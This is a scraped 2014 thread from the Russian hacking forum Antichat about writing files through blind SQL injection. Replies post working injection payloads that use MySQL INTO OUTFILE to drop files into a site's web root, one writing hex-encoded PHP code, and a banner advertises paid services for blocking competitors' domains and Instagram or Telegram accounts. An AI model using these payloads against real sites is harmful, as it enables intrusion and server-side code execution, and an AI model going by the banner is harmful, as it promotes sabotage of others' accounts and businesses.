Запись в файл при слепой SQL

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Запись в файл при слепой SQL

Опции темы

Поиск в этой теме

Опции просмотра

31.03.2014, 21:21

Mints97

Новичок

Регистрация: 22.02.2014

Сообщений: 8

Провел на форуме:
1621

Репутация: 0

31.03.2014, 22:21

BillyMilliga

Новичок

Регистрация: 13.03.2014

Сообщений: 6

Провел на форуме:
1348

Репутация: 11

Код:

id=' AND 1=0 or (select count(*) from (select 1 union select 2 union select 3)x group by concat((select 1 into outfile '/var/www/vulnsite.com/test.txt' lines terminated by ""),floor(rand(0)*2)))

01.04.2014, 18:04

psihoz26

Постоянный

Регистрация: 22.11.2010

Сообщений: 545

Провел на форуме:
182660

Репутация: 324

А так?

Код:

id=' AND 1=0 AND ((SELECT CONCAT(0x3c3f70687020706870696e666f2829203b203f3e) INTO OUTFILE '/var/www/vulnsite.com/test9110.txt'))+--+

01.04.2014, 19:08

Inoms

Участник форума

Регистрация: 23.06.2013

Сообщений: 103

Провел на форуме:
23349

Репутация: 45

Это очень удивительно, что подобная конструкция работает, если учесть всю её абсурдность(какая там версия mysql'а, что в ней подобное работает ?), а операторы insert,delete случаем в скобках не работают ? А по делу: попробуйте по-старинке, union'ом сделать вывод в файл, может получится.

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход